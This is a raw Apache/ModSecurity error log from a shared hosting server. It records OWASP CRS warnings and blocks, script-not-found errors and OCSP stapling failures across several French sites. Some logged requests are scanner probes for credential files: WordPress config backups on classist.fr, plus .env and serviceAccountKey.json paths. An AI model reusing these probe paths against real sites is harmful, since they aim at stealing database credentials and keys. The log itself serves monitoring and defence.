[Mon May 11 13:54:45.489809 2026] [security2:error] [pid 1319886:tid 1319916] [client 129.226.93.214:51906] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agHDhay-5-wpj6Sx56Z8JwAAAAs"]
[Mon May 11 13:54:47.444894 2026] [security2:error] [pid 1319885:tid 1319920] [client 114.119.140.85:39659] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: a59d047dded224d55641d5938e1b0a01||1778502284||1778501924"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/accommodation/mobil-home-confort/"] [unique_id "agHDh1chVQ3tCn0m9Oo7HgAAARE"]
[Mon May 11 13:54:47.447240 2026] [security2:error] [pid 1319885:tid 1319920] [client 114.119.140.85:39659] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/accommodation/mobil-home-confort/"] [unique_id "agHDh1chVQ3tCn0m9Oo7HgAAARE"]
[Mon May 11 13:54:48.336798 2026] [security2:error] [pid 1319885:tid 1319920] [client 114.119.140.85:39659] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agHDh1chVQ3tCn0m9Oo7HgAAARE"]
[Mon May 11 13:54:50.595146 2026] [security2:error] [pid 1319886:tid 1319926] [client 129.226.93.214:43318] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agHDiqy-5-wpj6Sx56Z8NAAAABE"], referer: http://www.maelbailly.fr
[Mon May 11 13:55:28.940798 2026] [authz_core:error] [pid 1319885:tid 1319922] [client 216.73.216.110:41826] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/auth/openid/error_log
[Mon May 11 13:55:54.452003 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:55.041765 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:55.382260 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:55.506785 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:56.078465 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:56.203000 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:56.327022 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:56.456436 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:56.586520 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:56.711655 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:56.835718 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:56.959783 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:57.112606 2026] [security2:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "classist.fr"] [uri "/wp-config.php.backup"] [unique_id "agHDzeJEyNRN152ArORt1gAAAEQ"]
[Mon May 11 13:55:57.112966 2026] [security2:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "classist.fr"] [uri "/wp-config.php.backup"] [unique_id "agHDzeJEyNRN152ArORt1gAAAEQ"]
[Mon May 11 13:55:57.113204 2026] [security2:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "classist.fr"] [uri "/wp-config.php.backup"] [unique_id "agHDzeJEyNRN152ArORt1gAAAEQ"]
[Mon May 11 13:55:57.237511 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:57.361481 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:57.485541 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:57.610893 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:57.757746 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:57.881595 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:58.005541 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:58.130375 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:58.419799 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:58.732162 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:58.860429 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:58.984826 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:59.109061 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:59.257702 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:59.381702 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:59.505814 2026] [security2:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "classist.fr"] [uri "/backup.wp-config.php"] [unique_id "agHDz-JEyNRN152ArORt-QAAAEQ"]
[Mon May 11 13:55:59.505963 2026] [security2:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "classist.fr"] [uri "/backup.wp-config.php"] [unique_id "agHDz-JEyNRN152ArORt-QAAAEQ"]
[Mon May 11 13:55:59.506189 2026] [security2:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "classist.fr"] [uri "/backup.wp-config.php"] [unique_id "agHDz-JEyNRN152ArORt-QAAAEQ"]
[Mon May 11 13:55:59.753494 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:55:59.881528 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:00.013306 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:00.198454 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:00.322807 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:00.503099 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:00.630390 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:00.754477 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:00.885770 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:01.012151 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:01.136600 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:01.260601 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:01.521313 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:01.650867 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:01.774753 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:01.898644 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:02.399504 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:02.658111 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:02.782464 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:02.910440 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:03.039369 2026] [security2:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "classist.fr"] [uri "/new-wp-config.php"] [unique_id "agHD0-JEyNRN152ArORuJgAAAEQ"]
[Mon May 11 13:56:03.039522 2026] [security2:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "classist.fr"] [uri "/new-wp-config.php"] [unique_id "agHD0-JEyNRN152ArORuJgAAAEQ"]
[Mon May 11 13:56:03.039732 2026] [security2:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "classist.fr"] [uri "/new-wp-config.php"] [unique_id "agHD0-JEyNRN152ArORuJgAAAEQ"]
[Mon May 11 13:56:03.163364 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:03.302126 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:03.660222 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:03.786360 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:04.231750 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:56:04.380842 2026] [proxy_fcgi:error] [pid 1320398:tid 1320404] [client 172.212.217.10:48699] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:57:01.097360 2026] [security2:error] [pid 1319885:tid 1319910] [client 102.165.1.250:56213] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHEDVchVQ3tCn0m9Oo8DgAAAQ0"], referer: https://www.piregwan-genesis.com/
[Mon May 11 13:57:28.589468 2026] [proxy_http:error] [pid 1320674:tid 1320711] (20014)Internal error (specific information not available): [client 5.255.118.168:29432] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 13:57:28.589480 2026] [proxy_http:error] [pid 1319886:tid 1319908] (20014)Internal error (specific information not available): [client 5.255.118.168:29468] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 13:57:28.589917 2026] [proxy:error] [pid 1320674:tid 1320711] [client 5.255.118.168:29432] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/backend/.env
[Mon May 11 13:57:28.589939 2026] [proxy:error] [pid 1319886:tid 1319908] [client 5.255.118.168:29468] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/serviceAccountKey.json
[Mon May 11 13:58:40.079652 2026] [security2:error] [pid 1319885:tid 1319938] [client 86.243.92.156:50046] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: ad8a6e2e3e5546da02860ec09cba81b8||1778501813||1778501453"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/accommodation/mobil-home-hawai/"] [unique_id "agHEcFchVQ3tCn0m9Oo8sAAAARg"], referer: https://rentparadise.fr/accommodation-category/mobile-homes/
[Mon May 11 13:58:40.080467 2026] [security2:error] [pid 1319885:tid 1319938] [client 86.243.92.156:50046] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/accommodation/mobil-home-hawai/"] [unique_id "agHEcFchVQ3tCn0m9Oo8sAAAARg"], referer: https://rentparadise.fr/accommodation-category/mobile-homes/
[Mon May 11 13:58:40.945353 2026] [security2:error] [pid 1319885:tid 1319938] [client 86.243.92.156:50046] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agHEcFchVQ3tCn0m9Oo8sAAAARg"], referer: https://rentparadise.fr/accommodation-category/mobile-homes/
[Mon May 11 13:59:13.506622 2026] [ssl:error] [pid 1319998:tid 1320006] (EAI 2)Name or service not known: [client 68.183.218.29:55234] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:59:13.507134 2026] [ssl:error] [pid 1319998:tid 1320006] AH01941: stapling_renew_response: responder error
[Mon May 11 13:59:15.582534 2026] [proxy_fcgi:error] [pid 1319953:tid 1319965] (70007)The timeout specified has expired: [client 154.253.19.35:63372] AH01075: Error dispatching request to : (reading input brigade)
[Mon May 11 13:59:16.230087 2026] [ssl:error] [pid 1320674:tid 1320692] (EAI 2)Name or service not known: [client 84.39.224.35:35299] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:59:16.230127 2026] [ssl:error] [pid 1320674:tid 1320692] AH01941: stapling_renew_response: responder error
[Mon May 11 13:59:16.976579 2026] [ssl:error] [pid 1320674:tid 1320709] (EAI 2)Name or service not known: [client 66.17.131.69:43551] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:59:16.976612 2026] [ssl:error] [pid 1320674:tid 1320709] AH01941: stapling_renew_response: responder error
[Mon May 11 13:59:17.583957 2026] [security2:error] [pid 1319885:tid 1319935] [client 43.135.144.81:49240] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agHElVchVQ3tCn0m9Oo83gAAARc"]
[Mon May 11 13:59:20.262957 2026] [ssl:error] [pid 1319953:tid 1319973] (EAI 2)Name or service not known: [client 14.44.23.94:9688] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:59:20.263012 2026] [ssl:error] [pid 1319953:tid 1319973] AH01941: stapling_renew_response: responder error
[Mon May 11 13:59:25.873435 2026] [security2:error] [pid 1319998:tid 1320001] [client 43.135.144.81:43330] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agHEnat2WtvoFr7xvGy55AAAAIE"], referer: http://www.pole-de-mobilite-regional.com
[Mon May 11 13:59:26.002768 2026] [ssl:error] [pid 1319998:tid 1320007] (EAI 2)Name or service not known: [client 159.223.11.101:56276] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:59:26.002812 2026] [ssl:error] [pid 1319998:tid 1320007] AH01941: stapling_renew_response: responder error
[Mon May 11 13:59:27.302961 2026] [ssl:error] [pid 1319998:tid 1320019] (EAI 2)Name or service not known: [client 206.204.60.98:33901] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:59:27.302996 2026] [ssl:error] [pid 1319998:tid 1320019] AH01941: stapling_renew_response: responder error
[Mon May 11 13:59:28.031098 2026] [ssl:error] [pid 1319953:tid 1319959] (EAI 2)Name or service not known: [client 66.17.131.48:34817] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:59:28.031135 2026] [ssl:error] [pid 1319953:tid 1319959] AH01941: stapling_renew_response: responder error
[Mon May 11 13:59:29.893216 2026] [security2:error] [pid 1319953:tid 1319974] [client 43.135.144.81:49852] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agHEoeSQ-m-m0ukSShtnUwAAAVM"], referer: https://www.pole-de-mobilite-regional.com/
[Mon May 11 13:59:36.079002 2026] [ssl:error] [pid 1320674:tid 1320694] (EAI 2)Name or service not known: [client 167.99.132.240:43664] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:59:36.079034 2026] [ssl:error] [pid 1320674:tid 1320694] AH01941: stapling_renew_response: responder error
[Mon May 11 13:59:40.750180 2026] [ssl:error] [pid 1319953:tid 1319979] (EAI 2)Name or service not known: [client 134.199.75.8:39391] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:59:40.750220 2026] [ssl:error] [pid 1319953:tid 1319979] AH01941: stapling_renew_response: responder error
[Mon May 11 13:59:49.582995 2026] [ssl:error] [pid 1320398:tid 1320412] (EAI 2)Name or service not known: [client 167.172.43.127:47890] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:59:49.583045 2026] [ssl:error] [pid 1320398:tid 1320412] AH01941: stapling_renew_response: responder error
